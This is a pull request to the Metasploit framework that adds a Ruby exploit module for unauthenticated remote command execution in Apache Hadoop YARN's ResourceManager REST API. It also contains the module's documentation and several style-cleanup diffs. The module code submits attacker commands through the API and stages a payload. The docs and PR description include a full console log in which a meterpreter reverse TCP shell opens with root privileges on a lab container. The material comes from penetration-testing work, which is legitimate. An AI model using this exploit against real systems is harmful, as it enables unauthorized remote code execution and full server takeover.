### PR TITLE
Hadoop unauthed command execution

### DIFF
--- a/documentation/modules/exploit/linux/http/hadoop_unauth_exec.md
+++ b/documentation/modules/exploit/linux/http/hadoop_unauth_exec.md
@@ -1,6 +1,6 @@
 ## Description  
 
-This module exploits an unauthorized command execution vulneralbility in Apache Hadoop through ResourceManager REST API.
+This module exploits an unauthenticated command execution vulnerability in Apache Hadoop through ResourceManager REST API.
 
 ## Vulnerable Application  
 

--- a/documentation/modules/exploit/linux/http/hadoop_unauth_exec.md
+++ b/documentation/modules/exploit/linux/http/hadoop_unauth_exec.md
@@ -1,0 +1,112 @@
+## Description  
+
+This module exploits an unauthorized command execution vulneralbility in Apache Hadoop through ResourceManager REST API.
+
+## Vulnerable Application  
+
+**Vulnerable Application Link** 
+
+- docker  
+
+https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn
+
+## Vulnerable Application Installation Setup.
+
+Change dictory to `vulhub/hadoop/unauthorized-yarn`, and run `docker-compose up -d` 
+
+
+## Verification Steps  
+
+  Example steps in this format (is also in the PR):
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/linux/http/hadoop_unauth_exec```
+  4. Do: ``set rhost x.x.x.x``
+  5. Do: ``set rport 8088``
+  6. Do: ``check``
+
+``[+] 192.168.77.141:8088 The target is vulnerable.``
+
+  7. Do: `set payload linux/x86/meterpreter/reverse_tcp`
+  8. Do: ``exploit``
+  9. You should get a shell.
+
+
+## Scenarios  
+
+```
+msf5 > use exploit/linux/http/hadoop_unauth_exec 
+msf5 exploit(linux/http/hadoop_unauth_exec) > show options 
+
+Module options (exploit/linux/http/hadoop_unauth_exec):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOST                     yes       The target address
+   RPORT    8088             yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+msf5 exploit(linux/http/hadoop_unauth_exec) > set rhost 192.168.77.141 
+rhost => 192.168.77.141        
+msf5 exploit(linux/http/hadoop_unauth_exec) > set payload linux/x86/meterpreter/reverse_tcp
+payload => linux/x86/meterpreter/reverse_tcp
+msf5 exploit(linux/http/hadoop_unauth_exec) > show options 
+
+Module options (exploit/linux/http/hadoop_unauth_exec):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOST    192.168.77.141   yes       The target address
+   RPORT    8088             yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (linux/x86/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+msf5 exploit(linux/http/hadoop_unauth_exec) > set lhost 192.168.77.141 
+lhost => 192.168.77.141
+msf5 exploit(linux/http/hadoop_unauth_exec) > exploit 
+
+[*] Started reverse TCP handler on 192.168.77.141:4444 
+[*] Sending Command
+[*] Command Stager progress - 100.00% done (763/763 bytes)
+[*] Sending stage (853256 bytes) to 172.20.0.3
+[*] Meterpreter session 1 opened (192.168.77.141:4444 -> 172.20.0.3:34138) at 2018-05-15 03:21:17 -0400
+
+meterpreter > getuid 
+Server username: uid=0, gid=0, euid=0, egid=0
+```

--- a/modules/exploits/linux/http/hadoop_unauth_exec.rb
+++ b/modules/exploits/linux/http/hadoop_unauth_exec.rb
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown
     end
 
-    if res and res.code == 200 and res.body.include?('application-id')
+    if res && res.code == 200 && res.body.include?('application-id')
       return CheckCode::Detected
     end
 

--- a/modules/exploits/linux/http/hadoop_unauth_exec.rb
+++ b/modules/exploits/linux/http/hadoop_unauth_exec.rb
@@ -9,11 +9,11 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
 
-  def initialize(info={})
+  def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Hadoop YARN ResourceManager Unauthorized Command Execution',
+      'Name'           => 'Hadoop YARN ResourceManager Unauthenticated Command Execution',
       'Description'    => %q{
-          This module exploits an unauthorized command execution vulnerability in Apache Hadoop through ResourceManager REST API.
+          This module exploits an unauthenticated command execution vulnerability in Apache Hadoop through ResourceManager REST API.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -38,16 +38,14 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultTarget'  => 0
       ))
 
-    register_options([
-      Opt::RPORT(8088)
-    ])
+    register_options([Opt::RPORT(8088)])
   end
 
 
   def check
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
-      'method'        => 'POST'
+      'uri'         => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
+      'method'      => 'POST'
     )
 
     unless res
@@ -69,8 +67,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_command(cmd, opts = {})
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
-      'method'        => 'POST'
+      'uri'         => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
+      'method'      => 'POST'
     )
 
     app_id = res.get_json_document['application-id']
@@ -80,12 +78,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'application-name'    => Rex::Text.rand_text_alpha_lower(4..12),
       'application-type'    => 'YARN',
       'am-container-spec'   => {
-          'commands' => {'command' => "#{cmd}"},
+          'commands' => {'command' => cmd.to_s},
       }
     }
 
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps'),
+      'uri'               => normalize_uri(target_uri.path, '/ws/v1/cluster/apps'),
       'method'            => 'POST',
       'ctype'             => 'application/json',
       'data'              => post.to_json

--- a/modules/exploits/linux/http/hadoop_unauth_exec.rb
+++ b/modules/exploits/linux/http/hadoop_unauth_exec.rb
@@ -11,9 +11,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "Hadoop YARN ResourceManager Unauthorized Command Execution",
+      'Name'           => 'Hadoop YARN ResourceManager Unauthorized Command Execution',
       'Description'    => %q{
-          This module exploits an unauthorized command execution vulneralbility in Apache Hadoop through ResourceManager REST API.
+          This module exploits an unauthorized command execution vulnerability in Apache Hadoop through ResourceManager REST API.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -31,10 +31,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'Arch'           => [ARCH_X86, ARCH_X64],
       'Targets'        =>
         [
-          ['Automatic',                             {} ],
+          ['Automatic',  {} ],
         ],
       'Privileged'     => false,
-      'DisclosureDate' => "Oct 19 2016",
+      'DisclosureDate' => 'Oct 19 2016',
       'DefaultTarget'  => 0
       ))
 
@@ -45,27 +45,31 @@ class MetasploitModule < Msf::Exploit::Remote
 
 
   def check
-
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, "/ws/v1/cluster/apps/new-application"),
+      'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
       'method'        => 'POST'
     )
-    if res and res.code == 200 and res.body.include?("application-id")
-      return CheckCode::Vulnerable
+
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
     end
 
-    CheckCode::Unknown
+    if res and res.code == 200 and res.body.include?('application-id')
+      return CheckCode::Detected
+    end
+
+    CheckCode::Safe
   end
 
   def exploit
-    print_status("Sending Command")
+    print_status('Sending Command')
     execute_cmdstager
   end
 
   def execute_command(cmd, opts = {})
-
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, "/ws/v1/cluster/apps/new-application"),
+      'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
       'method'        => 'POST'
     )
 
@@ -81,14 +85,10 @@ class MetasploitModule < Msf::Exploit::Remote
     }
 
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, "/ws/v1/cluster/apps"),
+      'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps'),
       'method'            => 'POST',
       'ctype'             => 'application/json',
       'data'              => post.to_json
-
     )
-
   end
-
-
 end

--- a/modules/exploits/linux/http/hadoop_unauth_exec.rb
+++ b/modules/exploits/linux/http/hadoop_unauth_exec.rb
@@ -43,13 +43,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
 
   def check
-    res = send_request_cgi(
-      'uri'         => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
-      'method'      => 'POST'
-    )
+    begin
+      res = send_request_cgi(
+        'uri'         => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
+        'method'      => 'POST'
+      )
 
-    unless res
-      vprint_error 'Connection failed'
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionError => e
+      vprint_error("#{peer} - Connection failed")
       return CheckCode::Unknown
     end
 

--- a/modules/exploits/linux/http/hadoop_unauth_exec.rb
+++ b/modules/exploits/linux/http/hadoop_unauth_exec.rb
@@ -1,0 +1,94 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Hadoop YARN ResourceManager Unauthorized Command Execution",
+      'Description'    => %q{
+          This module exploits an unauthorized command execution vulneralbility in Apache Hadoop through ResourceManager REST API.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'cbmixx',                                 # Proof of concept
+          'Green-m  <greenm.xxoo[at]gmail.com>'     # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'URL', 'http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf'],
+          [ 'URL', 'https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn']
+        ],
+
+      'Platform'       => 'linux',
+      'Arch'           => [ARCH_X86, ARCH_X64],
+      'Targets'        =>
+        [
+          ['Automatic',                             {} ],
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Oct 19 2016",
+      'DefaultTarget'  => 0
+      ))
+
+    register_options([
+      Opt::RPORT(8088)
+    ])
+  end
+
+
+  def check
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, "/ws/v1/cluster/apps/new-application"),
+      'method'        => 'POST'
+    )
+    if res and res.code == 200 and res.body.include?("application-id")
+      return CheckCode::Vulnerable
+    end
+
+    CheckCode::Unknown
+  end
+
+  def exploit
+    print_status("Sending Command")
+    execute_cmdstager
+  end
+
+  def execute_command(cmd, opts = {})
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, "/ws/v1/cluster/apps/new-application"),
+      'method'        => 'POST'
+    )
+
+    app_id = res.get_json_document['application-id']
+
+    post = {
+      'application-id'      => app_id,
+      'application-name'    => Rex::Text.rand_text_alpha_lower(4..12),
+      'application-type'    => 'YARN',
+      'am-container-spec'   => {
+          'commands' => {'command' => "#{cmd}"},
+      }
+    }
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, "/ws/v1/cluster/apps"),
+      'method'            => 'POST',
+      'ctype'             => 'application/json',
+      'data'              => post.to_json
+
+    )
+
+  end
+
+
+end


### PR DESCRIPTION
fix error https://github.com/rapid7/metasploit-framework/pull/10026 and pull request again.

## Description  

This module exploits an unauthorized command execution vulneralbility in Apache Hadoop through ResourceManager REST API.

## Vulnerable Application  

**Vulnerable Application Link** 

- docker  

https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn

## Vulnerable Application Installation Setup.

Change dictory to `vulhub/hadoop/unauthorized-yarn`, and run `docker-compose up -d` 


## Verification Steps  

  Example steps in this format (is also in the PR):

  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/linux/http/hadoop_unauth_exec```
  4. Do: ``set rhost x.x.x.x``
  5. Do: ``set rport 8088``
  6. Do: ``check``

``[+] 192.168.77.141:8088 The target is vulnerable.``

  7. Do: `set payload linux/x86/meterpreter/reverse_tcp`
  8. Do: ``exploit``
  9. You should get a shell.


## Scenarios  

```
msf5 > use exploit/linux/http/hadoop_unauth_exec 
msf5 exploit(linux/http/hadoop_unauth_exec) > show options 

Module options (exploit/linux/http/hadoop_unauth_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    8088             yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(linux/http/hadoop_unauth_exec) > set rhost 192.168.77.141 
rhost => 192.168.77.141        
msf5 exploit(linux/http/hadoop_unauth_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(linux/http/hadoop_unauth_exec) > show options 

Module options (exploit/linux/http/hadoop_unauth_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST    192.168.77.141   yes       The target address
   RPORT    8088             yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(linux/http/hadoop_unauth_exec) > set lhost 192.168.77.141 
lhost => 192.168.77.141
msf5 exploit(linux/http/hadoop_unauth_exec) > exploit 

[*] Started reverse TCP handler on 192.168.77.141:4444 
[*] Sending Command
[*] Command Stager progress - 100.00% done (763/763 bytes)
[*] Sending stage (853256 bytes) to 172.20.0.3
[*] Meterpreter session 1 opened (192.168.77.141:4444 -> 172.20.0.3:34138) at 2018-05-15 03:21:17 -0400

meterpreter > getuid 
Server username: uid=0, gid=0, euid=0, egid=0
```